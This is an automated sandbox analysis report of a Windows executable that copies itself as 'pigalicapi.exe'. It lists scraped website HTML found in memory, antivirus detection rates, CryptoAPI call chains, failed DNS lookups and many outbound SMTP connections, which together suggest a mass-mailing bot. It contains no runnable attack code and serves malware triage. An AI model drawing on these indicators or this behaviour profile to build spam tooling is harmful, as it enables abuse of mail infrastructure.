Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <a class="footicons" href="https://www.linkedin.com/company/elpro-lepenik/about/" target="_blank"><img id="LinkedIn" alt="LinkedIn" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" /></a> equals www.linkedin.com (Linkedin)
Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <a class="footicons" href="https://www.facebook.com/elprolepenik/" target="_blank"><img id="Facebook" alt="Facebook" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" /></a> equals www.facebook.com (Facebook)
Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/elprolepenik/" /> equals www.facebook.com (Facebook)
Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.facebook.com (Facebook)
Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.linkedin.com (Linkedin)
Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <div class="mfn-main-slider mfn-layer-slider"><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">jQuery(function() { _initLayerSlider( '#layerslider_78_164tu0cttw28r', {createdWith: '6.5.8', sliderVersion: '7.5.3', pauseOnHover: 'enabled', skin: 'v6', sliderFadeInDuration: 350, globalBGSize: 'cover', hoverPrevNext: false, navStartStop: false, showCircleTimer: false, useSrcset: true, skinsPath: 'http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/', performanceMode: true}); });</script><div id="layerslider_78_164tu0cttw28r" class="ls-wp-container fitvidsignore" style="width:1980px;height:400px;margin:0 auto;margin-bottom: 0px;"><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="2000" height="667" src="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg" class="ls-bg" alt="COMS.I.T. - Auf einen Blick" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg 2000w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg 50w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg 150w" sizes="(max-width: 2000px) 100vw, 2000px" /><ls-layer style="font-size:36px;color:#000;text-align:left;font-style:normal;text-decoration:none;text-transform:none;font-weight:400;letter-spacing:0px;background-position:0% 0%;background-repeat:no-repeat;top:38px;left:945px;width:560px;height:309px;" class="ls-l ls-media-layer"><iframe width="560" height="315" frameborder="0" allowfullscreen data-src="https://www.youtube.com/embed/e1ZfpowjQRo"></iframe></ls-layer></div><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="1980" height="726" src="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg" class="ls-bg" alt="" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg 1980w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg 50w, https://www.com-sit.com/wp-content/uploa
Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <div class="mfn-main-slider mfn-layer-slider"><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">jQuery(function() { _initLayerSlider( '#layerslider_78_4aoo8sib60q9', {createdWith: '6.5.8', sliderVersion: '7.5.3', pauseOnHover: 'enabled', skin: 'v6', sliderFadeInDuration: 350, globalBGSize: 'cover', hoverPrevNext: false, navStartStop: false, showCircleTimer: false, useSrcset: true, skinsPath: 'http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/', performanceMode: true}); });</script><div id="layerslider_78_4aoo8sib60q9" class="ls-wp-container fitvidsignore" style="width:1980px;height:400px;margin:0 auto;margin-bottom: 0px;"><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="2000" height="667" src="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg" class="ls-bg" alt="COMS.I.T. - Auf einen Blick" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg 2000w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg 50w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg 150w" sizes="(max-width: 2000px) 100vw, 2000px" /><ls-layer style="font-size:36px;color:#000;text-align:left;font-style:normal;text-decoration:none;text-transform:none;font-weight:400;letter-spacing:0px;background-position:0% 0%;background-repeat:no-repeat;top:38px;left:945px;width:560px;height:309px;" class="ls-l ls-media-layer"><iframe width="560" height="315" frameborder="0" allowfullscreen data-src="https://www.youtube.com/embed/e1ZfpowjQRo"></iframe></ls-layer></div><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="1980" height="726" src="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg" class="ls-bg" alt="" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg 1980w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg 50w, https://www.com-sit.com/wp-content/uploads

Source: 6gjnnBAbpc.exe	Virustotal: Detection: 17%			Perma Link
Source: 6gjnnBAbpc.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_040047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,	0_2_040047F0
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04004C47 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	0_2_04004C47
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	0_2_04008800
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	0_2_04008970
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	0_2_04008A70
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	0_2_04008BB0
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	0_2_04008CF0
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04004880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,	0_2_04004880
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E47F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,	1_2_024E47F0
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	1_2_024E8A70
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E4BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,	1_2_024E4BA0
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	1_2_024E8BB0
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	1_2_024E8800
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	1_2_024E8970
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E4880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,	1_2_024E4880
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	1_2_024E8CF0

Source: unknown	DNS traffic detected: query: www.wkhk.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: koz1.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: webband.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cvswl.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: amele.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: amba-tc.si replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: canmore.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.jroy.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: websy.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: awfraser.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: 89gospel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: anteph.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.ftchat.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: agitz.com.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chzko.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: polprime.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftchat.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: toundo.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cpwpb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: actmin.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.medisa.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: someikan.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: clysma.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: ludea.cz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.koz1.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.holleman.us replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: grlawcc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: haigh-me.com replaycode: Name error (3)

Source: Joe Sandbox View	IP Address: 104.26.7.17 104.26.7.17
Source: Joe Sandbox View	IP Address: 217.69.139.150 217.69.139.150

Source: global traffic	TCP traffic: 192.168.2.5:49931 -> 67.195.12.38:25
Source: global traffic	TCP traffic: 192.168.2.5:50070 -> 142.251.31.26:25
Source: global traffic	TCP traffic: 192.168.2.5:50106 -> 185.205.70.128:25
Source: global traffic	TCP traffic: 192.168.2.5:50130 -> 109.71.54.22:25
Source: global traffic	TCP traffic: 192.168.2.5:50131 -> 199.59.243.220:25
Source: global traffic	TCP traffic: 192.168.2.5:50133 -> 165.160.13.20:25
Source: global traffic	TCP traffic: 192.168.2.5:50134 -> 157.7.107.49:25
Source: global traffic	TCP traffic: 192.168.2.5:50135 -> 18.177.67.59:25
Source: global traffic	TCP traffic: 192.168.2.5:50150 -> 34.102.136.180:25
Source: global traffic	TCP traffic: 192.168.2.5:50155 -> 217.69.139.150:25
Source: global traffic	TCP traffic: 192.168.2.5:50156 -> 203.0.113.0:25
Source: global traffic	TCP traffic: 192.168.2.5:50157 -> 185.244.106.2:25
Source: global traffic	TCP traffic: 192.168.2.5:50159 -> 210.140.73.39:25
Source: global traffic	TCP traffic: 192.168.2.5:50161 -> 173.194.202.26:25
Source: global traffic	TCP traffic: 192.168.2.5:50170 -> 157.112.187.75:25
Source: global traffic	TCP traffic: 192.168.2.5:50177 -> 195.96.252.188:25
Source: global traffic	TCP traffic: 192.168.2.5:50181 -> 142.251.31.27:25
Source: global traffic	TCP traffic: 192.168.2.5:50182 -> 66.111.4.71:25
Source: global traffic	TCP traffic: 192.168.2.5:50184 -> 188.114.97.3:25
Source: global traffic	TCP traffic: 192.168.2.5:50185 -> 204.15.134.44:25
Source: global traffic	TCP traffic: 192.168.2.5:50189 -> 185.129.138.60:25
Source: global traffic	TCP traffic: 192.168.2.5:50194 -> 91.220.211.163:25
Source: global traffic	TCP traffic: 192.168.2.5:50195 -> 87.248.97.31:25
Source: global traffic	TCP traffic: 192.168.2.5:50196 -> 52.19.230.145:25
Source: global traffic	TCP traffic: 192.168.2.5:50197 -> 23.239.201.14:25
Source: global traffic	TCP traffic: 192.168.2.5:50200 -> 43.246.117.171:25
Source: global traffic	TCP traffic: 192.168.2.5:50201 -> 199.34.228.78:25
Source: global traffic	TCP traffic: 192.168.2.5:50209 -> 198.49.23.144:25
Source: global traffic	TCP traffic: 192.168.2.5:50217 -> 54.39.198.18:25
Source: global traffic	TCP traffic: 192.168.2.5:50238 -> 45.142.176.225:25
Source: global traffic	TCP traffic: 192.168.2.5:50240 -> 159.89.244.183:25
Source: global traffic	TCP traffic: 192.168.2.5:50242 -> 198.54.117.242:25
Source: global traffic	TCP traffic: 192.168.2.5:50246 -> 198.1.81.28:25
Source: global traffic	TCP traffic: 192.168.2.5:50249 -> 15.204.18.132:25
Source: global traffic	TCP traffic: 192.168.2.5:50278 -> 211.13.196.162:25
Source: global traffic	TCP traffic: 192.168.2.5:50286 -> 66.111.4.72:25
Source: global traffic	TCP traffic: 192.168.2.5:50303 -> 45.200.235.135:25
Source: global traffic	TCP traffic: 192.168.2.5:50330 -> 153.120.34.73:25
Source: global traffic	TCP traffic: 192.168.2.5:50519 -> 198.49.23.145:25
Source: global traffic	TCP traffic: 192.168.2.5:50597 -> 202.172.28.187:25
Source: global traffic	TCP traffic: 192.168.2.5:50805 -> 94.130.164.242:25
Source: global traffic	TCP traffic: 192.168.2.5:51437 -> 87.248.97.36:25
Source: global traffic	TCP traffic: 192.168.2.5:52319 -> 185.163.45.187:25
Source: global traffic	TCP traffic: 192.168.2.5:52598 -> 154.88.50.199:25
Source: global traffic	TCP traffic: 192.168.2.5:52599 -> 217.19.254.22:25
Source: global traffic	TCP traffic: 192.168.2.5:52600 -> 183.181.82.14:25
Source: global traffic	TCP traffic: 192.168.2.5:52601 -> 5.134.4.115:25
Source: global traffic	TCP traffic: 192.168.2.5:52603 -> 87.98.236.253:25
Source: global traffic	TCP traffic: 192.168.2.5:52602 -> 63.251.106.25:25
Source: global traffic	TCP traffic: 192.168.2.5:53127 -> 205.178.189.131:25
Source: global traffic	TCP traffic: 192.168.2.5:53175 -> 154.213.117.166:25
Source: global traffic	TCP traffic: 192.168.2.5:53176 -> 104.21.79.166:25
Source: global traffic	TCP traffic: 192.168.2.5:53178 -> 15.197.142.173:25
Source: global traffic	TCP traffic: 192.168.2.5:53179 -> 88.86.118.82:25
Source: global traffic	TCP traffic: 192.168.2.5:53264 -> 104.26.3.14:25
Source: global traffic	TCP traffic: 192.168.2.5:53415 -> 37.59.243.164:25
Source: global traffic	TCP traffic: 192.168.2.5:53689 -> 54.212.145.129:25
Source: global traffic	TCP traffic: 192.168.2.5:53690 -> 104.18.40.43:25
Source: global traffic	TCP traffic: 192.168.2.5:53691 -> 97.74.42.79:25
Source: global traffic	TCP traffic: 192.168.2.5:53697 -> 173.205.126.33:25
Source: global traffic	TCP traffic: 192.168.2.5:53698 -> 216.177.137.32:25
Source: global traffic	TCP traffic: 192.168.2.5:53709 -> 104.164.117.233:25
Source: global traffic	TCP traffic: 192.168.2.5:53738 -> 49.212.180.178:25
Source: global traffic	TCP traffic: 192.168.2.5:53821 -> 27.0.174.59:25
Source: global traffic	TCP traffic: 192.168.2.5:53992 -> 185.31.76.90:25
Source: global traffic	TCP traffic: 192.168.2.5:54299 -> 104.20.54.214:25
Source: global traffic	TCP traffic: 192.168.2.5:54315 -> 52.219.88.107:25
Source: global traffic	TCP traffic: 192.168.2.5:54317 -> 95.174.22.233:25
Source: global traffic	TCP traffic: 192.168.2.5:54352 -> 35.231.13.148:25
Source: global traffic	TCP traffic: 192.168.2.5:54364 -> 104.21.19.68:25
Source: global traffic	TCP traffic: 192.168.2.5:54522 -> 46.30.60.158:25
Source: global traffic	TCP traffic: 192.168.2.5:55454 -> 54.217.118.81:25
Source: global traffic	TCP traffic: 192.168.2.5:55496 -> 92.42.191.38:25
Source: global traffic	TCP traffic: 192.168.2.5:55584 -> 3.64.163.50:25
Source: global traffic	TCP traffic: 192.168.2.5:55608 -> 153.122.24.177:25
Source: global traffic	TCP traffic: 192.168.2.5:55594 -> 54.248.94.67:25
Source: global traffic	TCP traffic: 192.168.2.5:55706 -> 198.100.146.220:25
Source: global traffic	TCP traffic: 192.168.2.5:55770 -> 34.205.242.146:25
Source: global traffic	TCP traffic: 192.168.2.5:55901 -> 173.231.184.124:25
Source: global traffic	TCP traffic: 192.168.2.5:55945 -> 198.185.159.144:25
Source: global traffic	TCP traffic: 192.168.2.5:55946 -> 217.79.248.38:25
Source: global traffic	TCP traffic: 192.168.2.5:55993 -> 51.89.6.56:25
Source: global traffic	TCP traffic: 192.168.2.5:56018 -> 47.91.167.60:25
Source: global traffic	TCP traffic: 192.168.2.5:56664 -> 188.114.96.3:25
Source: global traffic	TCP traffic: 192.168.2.5:56665 -> 35.154.163.204:25
Source: global traffic	TCP traffic: 192.168.2.5:56797 -> 153.126.211.112:25
Source: global traffic	TCP traffic: 192.168.2.5:56879 -> 103.224.212.222:25
Source: global traffic	TCP traffic: 192.168.2.5:56839 -> 31.15.12.103:25
Source: global traffic	TCP traffic: 192.168.2.5:57338 -> 79.124.76.247:25
Source: global traffic	TCP traffic: 192.168.2.5:57570 -> 51.159.3.117:25
Source: global traffic	TCP traffic: 192.168.2.5:57799 -> 183.90.232.24:25
Source: global traffic	TCP traffic: 192.168.2.5:57905 -> 54.36.175.146:25
Source: global traffic	TCP traffic: 192.168.2.5:58946 -> 38.111.255.201:25
Source: global traffic	TCP traffic: 192.168.2.5:58953 -> 68.71.135.170:25
Source: global traffic	TCP traffic: 192.168.2.5:59063 -> 135.125.108.170:25
Source: global traffic	TCP traffic: 192.168.2.5:59233 -> 77.72.4.226:25
Source: global traffic	TCP traffic: 192.168.2.5:59596 -> 104.21.234.120:25
Source: global traffic	TCP traffic: 192.168.2.5:59974 -> 31.177.80.70:25
Source: global traffic	TCP traffic: 192.168.2.5:59975 -> 185.151.30.147:25
Source: global traffic	TCP traffic: 192.168.2.5:59976 -> 91.216.241.100:25
Source: global traffic	TCP traffic: 192.168.2.5:59977 -> 185.253.212.22:25
Source: global traffic	TCP traffic: 192.168.2.5:60400 -> 87.230.93.218:25
Source: global traffic	TCP traffic: 192.168.2.5:60500 -> 23.227.38.32:25
Source: global traffic	TCP traffic: 192.168.2.5:60527 -> 64.18.191.61:25
Source: global traffic	TCP traffic: 192.168.2.5:60537 -> 104.21.76.38:25
